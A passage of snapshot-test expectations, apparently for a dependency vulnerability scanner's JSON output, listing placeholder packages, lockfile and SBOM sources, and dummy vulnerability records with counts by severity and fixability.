"sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, 
"FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "Packagist", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 1 }, "Packages": [ { "Name": "author1/mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, 
"BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author3/mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, 
"Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], 
"VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 5, "OS": 0, "Project": 5, "Hidden": 1 }, "PackageTypeCount": { "Regular": 4, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 5, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 5 }, "FixableCount": { "Fixed": 0, "UnFixed": 5 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "NuGet", "Sources": [ { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { 
"Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "Packagist", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author1/mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "123abc", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { 
"Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author3/mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 
0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "", "Commit": "abcxyz", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, 
"LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 6 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "Ecosystems": [ { "Name": "", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "unknown:/path/to/my/third/lockfile", "Type": "unknown", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 
0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/no_sources - 1] { "Ecosystems": null, "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_no_packages - 1] { "Ecosystems": [ { "Name": "", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { 
"Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- 
[TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 1 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [ { "ID": "GHSA-123", "GroupIDs": [ "GHSA-123" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, 
"LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 1 }, "PackageTypeCount": { "Regular": 1, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "CRITICAL", "SeverityScore": "9" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 1, "High": 0, "Medium": 0, "Low": 0, 
"Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 1, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 1, "OS": 0, "Project": 1, "Hidden": 0 }, "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 1, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } } } --- [TestPrintOutputResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { 
